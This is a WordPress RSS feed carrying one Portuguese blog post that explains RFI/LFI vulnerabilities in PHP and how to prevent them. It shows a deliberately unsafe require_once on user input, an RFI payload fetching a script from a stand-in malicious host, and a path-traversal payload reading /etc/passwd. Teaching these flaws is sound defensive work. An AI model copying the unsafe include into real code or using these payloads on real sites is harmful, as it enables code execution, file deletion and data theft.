<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	
	xmlns:georss="http://www.georss.org/georss"
	xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#"
	>

<channel>
	<title>rfi Archives - Hiago Silva Souza</title>
	<atom:link href="https://www.hiago.me/tag/rfi/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.hiago.me/tag/rfi/</link>
	<description></description>
	<lastBuildDate>Sat, 13 May 2017 21:27:49 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.5.5</generator>

<image>
	<url>https://www.hiago.me/wp-content/uploads/2019/01/cropped-icon-hiagus-2-32x32.png</url>
	<title>rfi Archives - Hiago Silva Souza</title>
	<link>https://www.hiago.me/tag/rfi/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">147457425</site>	<item>
		<title>Segurança: O que é RFI / LFI?</title>
		<link>https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/</link>
					<comments>https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/#comments</comments>
		
		<dc:creator><![CDATA[Hiago Souza]]></dc:creator>
		<pubDate>Sat, 29 Apr 2017 21:24:50 +0000</pubDate>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[lfi]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[prevenção]]></category>
		<category><![CDATA[rfi]]></category>
		<category><![CDATA[segurança]]></category>
		<guid isPermaLink="false">http://localhost/hiago/?p=62</guid>

					<description><![CDATA[<p>[wp_ad_camp_3] RFI/LFI, do inglês (Remote/Local File Include) é um tipo de vulnerabilidade de segurança para páginas na internet. Essa vulnerabilidade pode ser usada para explorar, interromper e até obter dados usando um serviço na internet, uma vez que o mesmo interprete a inclusão do código a partir de uma informação enviada pelo cliente diretamente para a &#8230;</p>
<p>The post <a href="https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/">Segurança: O que é RFI / LFI?</a> appeared first on <a href="https://www.hiago.me">Hiago Silva Souza</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>[wp_ad_camp_3]</p>
<p>RFI/LFI, do inglês (Remote/Local File Include) é um tipo de vulnerabilidade de segurança para páginas na internet. Essa vulnerabilidade pode ser usada para explorar, interromper e até obter dados usando um serviço na internet, uma vez que o mesmo interprete a inclusão do código a partir de uma informação enviada pelo cliente diretamente para a aplicação.</p>
<h1>O Ataque!</h1>
<p>[wp_ad_camp_1]</p>
<p>O ataque ocorre quando o desenvolvedor faz a inclusão de arquivos, baseado em entradas dos usuários. Vamos colocar como exemplo, um formulário para selecionar o idioma de uma página:</p>
<blockquote><p>pagina.php</p></blockquote>
<pre class="brush: php; title: ; notranslate">
&lt;?php
   if(isset($_GET&#x5B;'idioma'))
        require_once($_GET&#x5B;'idioma']);
?&gt;
</pre>
<pre class="brush: xml; title: ; notranslate">


&lt;form method=&quot;GET&quot;&gt;
     &lt;select name=&quot;idioma&quot;&gt;
          &lt;option value=&quot;portugues.php&quot;&gt;Português&lt;/option&gt;
          &lt;option value=&quot;ingles.php&quot;&gt;Inglês&lt;/option&gt;
     &lt;/select&gt;
&lt;/form&gt;
</pre>
<p>Agora o php inclui um arquivo baseado na entrada do usuário, vamos ver alguns exemplos de entradas que poderiam causar dor de cabeça:</p>
<p>&nbsp;</p>
<blockquote><p>Exemplo de <strong>RFI</strong> (chamando um arquivo remoto&#8230;)</p>
<p>pagina.php?idioma=<b>http://malvado.exemplo.com.br/script-php-do-mal.txt?</b>. Agora imagine que o script-php-do-mal.txt contenha o seguinte conteúdo &#8220;@unlink(__DIR__ . &#8216;/pagina.php&#8217;);&#8221; pronto você acaba de perder seu script!</p></blockquote>
<blockquote><p>Exemplo de <strong>LFI</strong> (Chamando um arquivo local&#8230;)</p>
<p>pagina.php?idioma=<b>../../../../../etc/passwd%00?</b>. Você acaba de listar a senha de seus usuários UNIX online!</p></blockquote>
<p>&nbsp;</p>
<p><strong>Observação: </strong>Os exemplos acima são muitos comuns, e muitos provedores de hospedagem bloqueiam o acesso aos arquivos/url externas como citados nos exemplos. Os exemplos citados foram usados somente para mostrar possibilidades para exploração das falhas.</p>
<h1>Como se prevenir:</h1>
<p>[wp_ad_camp_2]</p>
<p>Caso você não seja o desenvolvedor e queira fazer uma precaução via servidor, você pode estar trabalhando com as configurações do PHP (ou do interpretador/linguagem que estiver usando), para isso desabilite a inclusão de URL&#8217;s no seu php.ini, para isso basta modificar o valor de allow_url_include para Off. No caso de LFI, o correto é o tratamento no próprio script (não fazendo uso de inclusões baseadas em informações de usuários), mas você pode se prevenir fazendo bom uso dos direitos que o próprio sistema operacional lhe oferece.</p>
<p>Obrigado!</p>
<p>Espero que com esse POST eu tenha contribuído para que vocês melhorem a segurança em suas aplicações.</p>
<p>The post <a href="https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/">Segurança: O que é RFI / LFI?</a> appeared first on <a href="https://www.hiago.me">Hiago Silva Souza</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">62</post-id>	</item>
	</channel>
</rss>
